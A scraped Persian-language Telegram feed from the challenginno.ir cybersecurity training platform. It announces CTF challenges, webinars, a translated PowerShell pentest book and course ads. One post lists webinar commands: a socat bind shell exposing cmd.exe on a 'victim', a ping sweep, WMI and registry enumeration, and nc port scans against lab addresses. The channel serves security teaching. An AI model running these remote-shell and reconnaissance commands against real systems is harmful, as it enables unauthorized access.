challenginno.ir
1.73K subscribers
293 photos
1 video
7 files
280 links
ارتقاء دانش و تخصص امنیت سایبری با دنیای حل چالش

@ENITP
Download Telegram
✔️ سلام و عرض ادب خدمت کلیه دوستان و همراهان گرامی

در راستای اهداف پلتفرم Challenginno، دومین رویداد Red/Blue Time در 16 بهمن ماه به صورت وبیناری برگزار خواهد شد.

در بخش اول وبینار به بررسی برخی از حملات سمت کاربر و فرآیندهای Post Exploitation پرداخته شده و در بخش دوم به شناسایی حملات انجام شده خواهیم پرداخت.


🔴 این رویداد به صورت رایگان برگزار شده و شما می توانید برای ثبت نام در این رویداد به لینک زیر مراجعه نمایید.

https://evand.com/events/%D8%AF%D9%88%D9%85%DB%8C%D9%86-%D8%B1%D9%88%DB%8C%D8%AF%D8%A7%D8%AF-red-blue-time-%D8%B3%D8%A7%DB%8C%D8%AA-challenginno-ir-5880?icn=organizer&ici=1
✔️ پروتکل HTTP یکی از مهم‌ترین پروتکل‌های اینترنتی است که به‌عنوان استانداردی برای انتقال داده‌ها بین کلاینت (مانند مرورگر وب) و سرور مورد استفاده قرار می‌گیرد.


پروتکل HTTP در زمینه تست نفوذ وب اهمیت بسیار زیادی دارد، زیرا اساس ارتباطات در برنامه‌های وب است و درک دقیق آن برای شناسایی و بهره‌برداری از آسیب‌پذیری‌های امنیتی ضروری است.

در این چالش که به صورت پرسش و پاسخ طراحی شده است، قصد داریم تا شما را با پروتکل HTTP بیشتر آشنا نماییم.


🔴 برای مشاهده چالش به لینک زیر مراجعه نمایید:

🌐 https://challenginno.ir/challenge/http-the-definitive-guide
✔️ پروتکل HTTP یکی از مهم‌ترین پروتکل‌های اینترنتی است که به‌عنوان استانداردی برای انتقال داده‌ها بین کلاینت (مانند مرورگر وب) و سرور مورد استفاده قرار می‌گیرد.


پروتکل HTTP در زمینه تست نفوذ وب اهمیت بسیار زیادی دارد، زیرا اساس ارتباطات در برنامه‌های وب است و درک دقیق آن برای شناسایی و بهره‌برداری از آسیب‌پذیری‌های امنیتی ضروری است.

در این چالش که به بخش دوم از مباحث مربوط به پروتکل HTTP می پردازیم.


🔴 برای مشاهده چالش به لینک زیر مراجعه نمایید:

🌐 https://challenginno.ir/challenge/http-the-definitive-guide-2
✔️ یک تحلیل‌گر امنیتی در حال بررسی نفوذ مشکوک به سیستم Windows 10 است. کاربران گزارش داده‌اند که فعالیت‌های غیرعادی مشاهده کرده‌اند، اما هیچ برنامه‌ای به طور واضح در حال اجرا نیست.


شما یک دقیقۀ طلایی (Golden Minute) برای بررسی فایل حافظه و شناسایی تهدید دارید. مهاجم از فایل مخرب استفاده کرده است تا به سیستم دسترسی بگیرد.


وظیفه شما این است که حافظه سیستم را بررسی نموده، فرآیند مخرب را شناسایی کنید و روش ارتباط آن را کشف نمایید.


🔴 برای مشاهده چالش به لینک زیر مراجعه نمایید:

🌐 https://challenginno.ir/challenge/memory-forensic
Forwarded from securityworld
PowerShell for Pentest-Final.pdf
2.7 MB
پاورشل به عنوان یک ابزار قدرتمند در سیستم‌عامل ویندوز، نه تنها برای مدیریت و خودکارسازی وظایف مدیریتی استفاده می‌شود، بلکه مورد توجه متخصصان امنیت نیز قرار گرفته است.

📌 در این کتاب، به بررسی روش‌های مختلف تست نفوذ با پاورشل خواهیم پرداخت. از شناسایی و جمع‌آوری اطلاعات گرفته تا بهره‌برداری و Post-Exploitation، تکنیک‌هایی معرفی خواهند شد که به کارشناسان امنیت کمک می‌کنند تا نقاط ضعف شبکه‌ها و سیستم‌ها را شناسایی کرده و برای بهبود امنیت اقدام کنند.

🔰 لازم به ذکر است که مستند پیش رو، ترجمه بخش‌هایی از کتاب PowerShell for Penetration Testing نوشته Dr. Andrew Blyth است.

🌐 همچنین که به زودی چالش های مرتبط با این کتاب در وب سایت challenginno.ir قرار داده خواهد شد.
challenginno.ir
red-blue-02.wmv
✔️ سلام و عرض ادب خدمت کلیه دوستان و همراهان گرامی

در راستای اهداف پلتفرم Challenginno، دومین رویداد Red/Blue Time در 16 بهمن ماه به صورت وبیناری برگزار شد.

فیلم وبینار هم اکنون در دسترس دوستان می باشد.


🔴 ممنون از همه دوستان گرامی که در این وبینار حضور داشتند منتظر اخبار بعدی ما باشید

🌐https://t.iss.one/RedTeamAPT
🌐 https://challenginno.ir
challenginno.ir
red-blue-02.wmv
🔴 لیست دستورات مربوط به وبینار دوم Red/Blue Time

`socat - TCP4:192.168.141.157:4447 ---- > on kali with victim ip
--------
`socat -d -d TCP4-LISTEN:4447 EXEC:'cmd.exe',pipes ----> on victim
-----------
for /L %i in (1,1,254) do @ping -n 1 -w 100 192.168.141.%i | find "TTL="
------------
tracert 192.168.141.138
Resolve-DnsName "192.168.141.138"
wmic /node:"192.168.141.138" os get
Get-WmiObject -Class Win32_Share -ComputerName "192.168.141.138"
-------
reg query "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\
wmic product get name
-------------
C:\Users\OMID\AppData\Roaming\MobaXterm\slash\bin
C:\Users\OMID\AppData\Roaming\MobaXterm\slash\etc\sessionsaliases.sh
`nc -zv 192.168.1.1 80-100`
`pktmon start --capture --comp nics --file-name C:\capture.etl`
`pktmon stop`
`pktmon format C:\capture.etl -o C:\capture.txt`
✔️ آسیب‌پذیری SQL Injection یکی از رایج‌ترین و خطرناک‌ترین نقاط ضعف امنیتی در برنامه‌های تحت وب است. این آسیب پذیری زمانی رخ می‌دهد که ورودی‌های کاربر به‌درستی اعتبارسنجی یا فیلتر نشوند و مستقیماً در کوئری‌های SQL استفاده شوند.


در این چالش سعی شده است که به آسیب‌پذیری NoSQL Injection پرداخته شده و دیتابیس MongoDB در آن مورد بررسی قرار داده شود.


این جالش شامل دو مرحله اکسپلویت آسیب‌پذیری به منظور شناسایی فلگ اول و اتصال به دیتابیس جهت استخراج اطلاعات و شناسایی فلگ دوم است.


🔴 برای مشاهده چالش به لینک زیر مراجعه نمایید:

🌐 https://challenginno.ir/challenge/no-sqli-njection
✔️ یکی واحدهای مهم که وجود آن در امنیت بسیار حائز اهمیت است، واحد پاسخگویی به حادثه یا Incident Response است.


تیم Incident Response پس از بررسی های اولیه بر روی یک سیستم، به این نتیجه می رسد که احتمالا فردی به این سیستم دسترسی گرفته و سیستم آلوده شده است. همچنین برخی از شواهد نشان دهنده دسترسی نفوذگر به اطلاعات داخلی شبکه است. بدین منظور، تیم پاسخگویی به حادثه تصمیم می گیرد تا ترافیک ایجاد شده در یک بازه زمانی را بررسی نماید.


هم اکنون فایل pcap ترافیک در اختیار شما قرار دارد و شما می بایست با بررسی این فایل به سوالات مطرح شده در چالش پاسخ دهید.


🔴 برای مشاهده ششمین بخش از این مجموعه چالش به لینک زیر مراجعه نمایید:

🌐 https://challenginno.ir/challenge/incident-response-6
✍🏻دوره Splunk Engineering
مدت زمان: 36 ساعت
🧑🏻‍💻مدرس :‌
احمدرضا نوروزی

📚سرفصل ها :

Deploying Splunk
Splunk Installation
Secure Splunk Enterprise
Manage Users & Roles
Monitoring Splunk
Licensing Splunk
Configuration File & Directory Structure
Manage Indexes
Manage Cluster Master & Indexers
Create Indexes.Conf
Manage Deployment Server
Configuring Basic Forwarding
Configuring Search Head Cluster & Deployer
Configuring Heavy Forwarder Cluster
Splunk Multisite Structure


📝ثبت نام از طریق :

🆔@soorin_sec
☎️09102144597

تیم سورین
✔️ یک سازمان بزرگ متوجه شده است که یکی از سرورهای ویندوزی آن، علائم فعالیت مشکوک دارد.


تیم امنیتی متوجه شده که برخی از حساب‌های کاربری دارای فعالیت غیرعادی هستند، اما هیچ نشانه‌ای از بدافزار یا ابزارهای شناخته‌شده نفوذ وجود ندارد.


وظیفه‌ی شما این است که ردپای مهاجم را پیدا کنید، نحوه‌ی ورود او را کشف کنید، و اقدامات او را تحلیل کنید.


🔴 برای مشاهده چالش به لینک زیر مراجعه نمایید:

🌐 https://challenginno.ir/challenge/windows-forensic/
✔️ یک شرکت امنیتی متوجه می‌شود که یکی از کارمندانش که دارای سطح دسترسی بالای هست، فایل‌های حساس را از سیستم خود پاک کرده است.


تیم امنیتی باید مشخص کند که آیا فایل‌های حذف شده بازیابی‌پذیر هستند یا خیر، چه اطلاعاتی در متادیتا باقی مانده و آیا نشانه‌ای از مخفی‌سازی اطلاعات با استفاده از Alternate Data Streams (ADS) یا دیگر تکنیک‌ها وجود دارد.


برای حل این چالش شما می بایست تمامی شواهد در MFT، ADS، Prefetch، Event Logs و تغییرات متادیتا را بررسی نمایید.


🔴 برای مشاهده چالش به لینک زیر مراجعه نمایید:

🌐 https://challenginno.ir/challenge/for500
✔️ قسمت Authorization Testing یکی از بخش‌های کلیدی در OWASP Web Security Testing Guide یا WSTG است که به بررسی و ارزیابی مکانیزم‌های تعیین سطوح دسترسی و Authorization در برنامه‌های وب می‌پردازد.


آسیب‌پذیری Bypassing Authorization Schema زمانی رخ می‌دهد که یک مهاجم بتواند با دور زدن مکانیزم‌های کنترل دسترسی، به منابع یا عملکردهایی که نباید در دسترس او باشند، دسترسی پیدا کند.


در این چالش که در سه مرحله ایجاد شده است، در هر مرحله شما باید به پنل ادمین برنامه دسترسی پیدا نموده و فلگ را از آن استخراج نمایید.


🔴 برای مشاهده چالش به لینک زیر مراجعه نمایید:

🌐 https://challenginno.ir/challenge/bypassing-authorization-schema
✔️ یکی از سوالاتی که همیشه در حوزه های مختلف امنیت سایبری به خصوص حوزه های Red Team و SOC مطرح بوده است، نحوه شروع به کار با فریمورک MITRE ATT&CK می باشد.


فریمورک MITRE ATT&CK یک پایگاه دانش جهانی از تاکتیک‌ها و تکنیک‌های مهاجمان بر اساس مشاهدات واقعی است. این پایگاه دانش به عنوان بنیادی برای توسعه مدل‌ها و متدولوژی‌های تهدید در بخش خصوصی، دولت و جامعه محصولات و خدمات امنیت سایبری به کار می‌رود.


در این چالش که به صورت پرسش و پاسخ طراحی شده است، سعی شده تا شما را در پاسخ به این سوال که چگونه استفاده از فریمورک MITRE ATT&CK را آغاز کنیم، راهنمایی کند.


🔴 برای مشاهده چالش به لینک زیر مراجعه نمایید:

🌐 https://challenginno.ir/challenge/mitre-attack
Getting Start with MITRE ATTaCK.pdf
2.3 MB
این کتاب با هدف آشنایی شما با MITRE ATT&CK، کاربردهای آن در تحلیل تهدیدات، شناسایی نقاط ضعف، تقویت استراتژی‌های امنیتی و بهبود پاسخگویی به حملات نگارش شده است.


محتوای این کتاب توسط وب سایت MITRE تهیه شده و برگرفته از مقالات Katie Nickels، John Wunder، Blake Strom، Tim Schulz و Andy Applebaum می‌باشد و در آن به نحوه چگونگی شروع استفاده از فریمورک MITRE ATT&CK پرداخته شده است.
✔️ عبارت Veiled Attack به یک حمله سایبری پیچیده اشاره دارد که هدف آن مخفی نگه داشتن شواهد و فعالیت‌های مخرب از ابزارهای شناسایی و تحلیل است.

در این سناریو، حمله‌کننده با استفاده از تکنیک‌های مختلف مانند تغییرات پنهانی در سیستم (مانند اضافه کردن رکورد به رجیستری، ساخت پوشه‌های مخفی، و ایجاد فرآیندهای جعلی)، سعی می‌کند تا حمله را از سیستم‌های امنیتی و تحلیلگران مخفی نگه دارد.


هدف از این حمله پنهان‌سازی اطلاعات حساس و دشوار کردن شناسایی برای تحلیلگران و ابزارهای امنیتی است.


🔴 برای مشاهده چالش به لینک زیر مراجعه نمایید:

🌐 https://challenginno.ir/challenge/veild-attack
🔸با سلام و عرض ادب خدمت کلیه دوستان و همراهان گرامی

✔️ اگر به دنیای امنیت سایبری علاقه دارید و می‌خواهید با مبانی و مفاهیم اولیه این حوزه آشنا شوید، چالش‌های پیش‌نیاز موجود در سایت ما گزینه مناسبی برای شروع هستند. در این آموزش‌ها به موضوعاتی مثل شبکه، لینوکس، سیسکو، اکیتو دایرکتوری و پروتکل HTTP پرداخته شده که می‌تواند پایه‌ای قوی برای پیشرفت‌های بعدی شما را فراهم کند.

🔴 برای دیدن جزئیات و شروع یادگیری، از لینک‌های زیر استفاده کنید.


🔰 آشنایی اولیه با شبکه

https://challenginno.ir/challenge/network-fundamental/

🔰 آشنایی با مقدمات لینوکس

https://challenginno.ir/challenge/linux-fundamental/

🔰 آشنایی با مفاهیم اکتیو دایرکتوری

https://challenginno.ir/challenge/active-directory-concepts/

🔰 آشنایی با مفاهیم اولیه سیسکو

https://challenginno.ir/challenge/cisco-concepts/

🔰 آشنایی با پروتکل HTTP - بخش اول

https://challenginno.ir/challenge/http-the-definitive-guide/

🔰 آشنایی با پروتکل HTTP - بخش دوم

https://challenginno.ir/challenge/http-the-definitive-guide-2/
🔸 برای علاقه‌مندان به تست نفوذ وب و امنیت اپلیکیشن‌های تحت وب، مجموعه‌ای از چالش‌های عملی بر پایه Web Security Testing Guide (WSTG) را طراحی کرده ایم. این چالش‌ها فرصتی را فراهم می‌کنند تا مفاهیم امنیتی را به‌صورت عملی تمرین کرده و مهارت‌های تست نفوذ خود را در سناریوهای واقعی تقویت کنید.


🔴 جهت مشاهده چالش‌ها مبتنی بر WSTG به لینک‎های زیر مراجعه کنید:


🔰 آشنایی آسیب پذیری XSS - بخش اول

https://challenginno.ir/challenge/game-with-xss-vulnerability/

🔰 بازی با WSTG- بخش Identity Management

https://challenginno.ir/challenge/wstg-identity-management/

🔰 بازی با SSRF - بخش اول

https://challenginno.ir/challenge/server-side-request-forgery/

🔰 لابراتوار آسیب پذیری CORS

https://challenginno.ir/challenge/cross-origin-resource-sharing/

🔰 لابراتوار آسیب پذیری File Inclusion

https://challenginno.ir/challenge/local-and-remote-file-inclusion/

🔰 لابراتوار آسیب پذیری Authentication

https://challenginno.ir/challenge/authentication-testing/
📢 اطلاعیه مهم 📢

🔸سلام و عرض ادب به همه کاربران گرامی! 👋🏼

🔰ما همیشه تلاش کرده‌ایم خدماتی باکیفیت و مناسبی را در سایت Challenginno به شما دوستان گرامی ارائه دهیم. تا امروز پلن رایگان سایت فعال بود، اما برای بهبود کیفیت خدمات و اضافه کردن امکانات جدید، از این پس سایت به‌صورت اشتراکی در دسترس خواهد بود.

البته کماکان بیش از 50 چالش وب سایت به صورت رایگان در اختیار شما خواهد بود.

💡 خبر خوب! برای قدردانی از حمایت شما عزیزان، تا پایان ایام عید نوروز، کاربران فعلی می‌توانند با ۵۰٪ تخفیف اشتراک تهیه کنند! 🎉

🔹 جزئیات اشتراک و مزایای آن را می‌توانید در سایت مشاهده کنید.

🔹 این تخفیف ویژه فقط تا پایان تعطیلات نوروزی فعال است، پس فرصت را از دست ندهید!

🔴 از همراهی شما سپاسگزاریم و مشتاقیم که همچنان در کنار ما باشید. ❤️

🌐 https://challenginno.ir/subscription
✔️ شما با شرکتی معتبر که یکی از پیشروترین شرکت‌ها در زمینه توسعه نرم‌افزارهای اتوماسیون است، قرارداد تست نفوذ منعقد کرده‌اید.

تیم مهندسی آن‌ها از یک سیستم CI/CD برای مدیریت Build ها و Deploy های خود استفاده می‌کند. اما با توجه به اسکن‌های انجام شده و همچنین بررسی نتایج آن‌ها، به نظر می‌رسد که یکی از سرورها به درستی پیکربندی نشده و دارای آسیب‌پذیری می‌باشد.


آسیب‌پذیری با CVE در سال 2024 منتشر شده و فلگ نیز در درایو C در یک پوشه قرار دارد. البته دسترسی به آن کمی سخت است و برای خواندن آن باید از قابلیت‌های نرم افزار CI/CD موجود و همچنین دانش خود در زمینه تست نفوذ استفاده کنید.


🔴 این چالش رایگان بوده و شما می توانید برای مشاهده چالش به لینک زیر مراجعه نمایید:

🌐 https://challenginno.ir/challenge/vulnerable-service-6-ci-cd